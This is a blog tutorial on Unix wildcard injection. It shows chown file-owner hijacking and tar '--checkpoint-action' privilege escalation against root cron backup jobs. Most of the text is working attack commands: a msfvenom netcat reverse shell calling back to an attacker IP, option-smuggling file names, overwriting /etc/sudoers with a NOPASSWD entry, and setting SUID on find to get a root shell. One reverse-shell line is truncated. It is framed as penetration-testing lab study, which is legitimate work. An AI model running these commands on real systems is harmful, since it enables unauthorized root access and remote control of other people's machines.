Hello friends!! In this article, we will cover “Wildcard
Injection” an interesting old-school UNIX hacking technique, which is still a
successful approach for Post exploitation and even many security-related folks
haven't heard of it. Here you will get surprised after perceiving some UNIX
tools like 'tar' or 'chown' can lead to full system compromise.
Table of content
Introduction
Wildcard
Wildcard wildness example 1
File hijacking example 2
Post Exploitation via tar (Phase I)
Tar Wildcard Injection (1st method)
Post Exploitation via tar (Phase II)
Tar Wildcard Injection (1st method)
Tar Wildcard Injection (2nd method)
Tar Wildcard Injection (3rd method)
Let’s Start!!!
WILDCARD
The wildcard is a character or set of characters that can be
used as a replacement for some range/class of characters. Wildcards are
interpreted by the shell before any other action is taken.
Some Wildcards character:
* An asterisk matches any number of
character in a filename, including none.
?
The question mark matches any single character.
[ ] Brackets enclose a set of characters, any one
of which may match a single character at that position.
- A hyphen used within [ ] denotes a range of characters.
~ A tilde at the beginning of a word expands
to the name of your home directory. Append another user's login name to the character,
it refers to that user's home directory.
1st Example
You might be aware of wildcard symbol and their
traditional usage but here we are presenting wildcard wildness and for this, I
would like to draw your attention towards below steps.
cd /Desktop
mkdir wild
cd wild
echo “Hello
Friends” > file1
echo “This is
wildcard Injection” >file2
echo “take help”
> --help
So as you can observe, here we have made a new directory
"wild" on the desktop then with help of echo command we have created
3 files and written 1 line in each file.
Afterwards, with help of cat command, we try to open all
above 3 files as shown:
cat file1
cat file 2
cat --help
However, the first two files opened normally and show the
same information as written above. But the cat command failed to read
information written inside --help file. Instead of showing “take help” while opening
--help file it calls its own --help options from its own libraries & such
type of trick is called Wildcard
wildness.
File owner hijacking
via Chown
Similarly again we try to do something roguish with help
of chown command. As we know it is an
abbreviation of change owner,
which is used on Unix-like systems to modify the ownership of file
system files, directories and it may only be changed by a super-user.
Let say we have three users in our system.
Super-user (root)
- perform admin-level task such as run chown command.
Non-root-user1 (raj)
- perform ordinary jobs such as create file
Non-root-user2 (aarti)
- perform ordinary jobs such as create file
Mischief-user (Ignite)
- perform the notorious task such as Chown file reference trick that can lead
file owner hijacking.
In the following image, you can observe all the PHP file is
owned by user: raj. Now when the user: ignite found all PHP file is own be user
raj then he induce two PHP file himself in the same directory and use file
reference trick for file owner hijacking by executing below commands.
cd
ls -al
echo “” >
my.php
echo >
--reference=my.php
As you can notice, mostly file is owned user: raj and the
last two files are owned by user: ignite and when the super-user will be
supposed to change ownership of all file having PHP extension with help of
wildcard, then all files will indirectly come under the ownership of user:
ignite.
As you can observe when root user run chown command to give ownership
of all PHP file to the user: aarti, an error occurred and as result, the all
PHP file get seized by user: ignite automatically.
chown -R
aarti:aarti *.php
ls -al
Conceptual
Information:
If you have ever explored chown to read its optional
switches then you will find the following option.
--reference=RFILE
(use RFILE's owner and group rather than specifying OWNER:GROUP values)
In our case user: ignite executed following commands:
echo “” >
my.php
echo >
--reference=my.php
Then root user takes help of wildcard character for
changing ownership. Thing is that wildcard character used in 'chown' command
line took subjective '--reference=.my.php' file and passed it to the chown
command at the command line as an option.
Post Exploitation via
tar (Phase I)
Lab-Setup
Likewise again we extend the wildness of wildcard character
to the ultimate level and it was like a dynamic explosion in terms of system
hacking.
Tar is very common UNIX program for creating and extracting
archives. And with help of it, we are going to take compress backup of any directory.
For example, make a new directory and give ALL permission to it and then create
some files.
mkdir html
chmod 777 html
cd html
touch index.html
touch raj
touch file.txt
Now schedule a task with help of crontab to run tar archival
program for taking backup of /html from inside /var/backups in every 1 minute.
nano /etc/crontab
*/1 * * * *
root tar -zcf /var/backups/html.tgz /var/www/html/*
Let’s verify the schedule is working or not by executing
following command.
cd /var/backup
ls
Tar Wildcard Injection (1st method)
Privilege
Escalation
Start your attacking machine and first compromise the target
system and then move to privilege escalation stage. Suppose I successfully
login into victim’s machine through ssh and access non-root user terminal. Then
open crontab to view if any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a tar archival
program for every 1 minute and we know that cron job runs as root. Let’s try to
exploit.
On a new terminal generate netcat reverse shell malicious
code for achieving netcat reverse connection by using msfvenom and enter the
following command for that.
msfvenom -p
cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
Copy the generated
payload and paste inside victim's shell as described below.
nc -lvp 8888
Now paste above copied payload as describe below and ran the
following commands inside victim’s tty shell.
echo "mkfifo
/tmp/lhennp; nc 192.168.1.102 8888 0
echo ""
> "--checkpoint-action=exec=sh shell.sh"
echo ""
> --checkpoint=1
tar cf archive.tar
*
The above commands help the tar command to run the file
shell.sh, after the first file is archived. Since the tar command is running as
root due to crontab, this has the effect of spawning a netcat shell and sending
it to the attack platform on port 8888. And if you go back to the terminal
window where the listener was on, you will have victim’s reverse connection in after
1 minute.
id
whoami
Conceptual
Information:
If you have ever explored chown to read its optional
switches then you will find the following option.
--checkpoint[=NUMBER]
show progress messages every Numbers record (default 10)
--checkpoint-action=ACTION execute ACTION
on each checkpoint
There is '--checkpoint-action' option, that will specify
the program which will be executed when the checkpoint is reached. Mainly, this
permits us to run an arbitrary command. Hence Options '--checkpoint=1' and
'--checkpoint-action=exec=sh shell.sh' are handed to the 'tar' program as
command line options.
Post Exploitation via
tar (Phase II)
Lab Setup
There are multiple ways to take compressed backup and multi
techniques can also be applied for privilege escalation. In this phase, with
help of tar, we are going to take compress backup of a directory. For example,
make a new directory whose backup you wish to take and give ALL permission to
it and then create some files.
cd /tmp
mkdir data
cd data
echo “” > f1
echo “” > f2
echo “” > f3
ls
Now in other directory write a bash script for taking backup
of /tmp/data with help of tar archive program.
mkdir info
cd info
nano script.sh
chmod 777
script.sh
#!/bin/bash
cd /tmp/data
tar cf
/backup/backup.tgz *
Now schedule a task with help of crontab to run tar archival
program for taking backup of /html inside /var/backups in every 1 minute.
nano /etc/crontab
*/1 * * * *
root /info/script.sh
And after 1 minute you will notice backup.tgz file is
generated inside info directory.
Tar Wildcard Injection
Privilege
Escalation
Start your attacking machine and first compromise the target
system and then move to privilege escalation stage. Suppose I successfully
login into victim’s machine through ssh and access non-root user terminal. Then
open crontab to view if any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a bash program
script for every 1 minute and we know that cron job runs as root. The minute
attacker read the program written inside the script.sh, he can apply tar
wildcard injection.
Again generate netcat reverse shell payload as done above.
And again repeat above step as
shown in the image.
Then get back to netcat shell for victim’s reverse
connection and you will notice after 1 minute you get victim’s netcat session.
whoami
cd /root
pwd
Hence, the target can be easily exploited if he makes
usage tar archive program either by scheduling job via command or through bash
script.
Tar Wildcard Injection (2nd method)
Privilege Escalation
Basically, with help wildcard injection an attack want to
gain the highest privilege of the system, therefore, he will try to inject some
malicious code with help of tar for root access. But there are multiple ways to
obtain root access and hence you can apply following techniques for privilege
escalation.
Suppose you have victim's machine as a non-root user and
for privilege escalation either take root access or try to give sudo right to
non-root user by adding him sudoers file. Thus you can take help of following
commands.
echo 'echo
"ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo ""
> "--checkpoint-action=exec=sh demo.sh"
echo ""
> --checkpoint=1
tar cf archive.tar
*
With the help of above command we had tried to give root
permission to the user: ignite and for 1 minute. After 1 minute passed we
successfully owned root account.
sudo -l
sudo bash
whoami
Tar Wildcard Injection (3rd method)
Privilege Escalation
There are multiple ways for privilege escalation with
help of tar injection but we are discussing very few methods among them. Suppose
you have victim's machine as the non-root user and for privilege escalation, you
can try to enable SUID bit for any system binaries and likewise above again you
can take help of the following command for obtaining root access.
echo "chmod
u+s /usr/bin/find" > test.sh
echo ""
> "--checkpoint-action=exec=sh test.sh"
echo ""
> --checkpoint=1
tar cf archive.tar
*
ls -al
/usr/bin/find
find f1 -exec
"whoami" \;
root
find f1 -exec
"/bin/sh" \;
id
whoami
WOOhOOO!! Hope you people will enjoy this trick while
penetration testing.
Source:
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
0 comments:
Post a Comment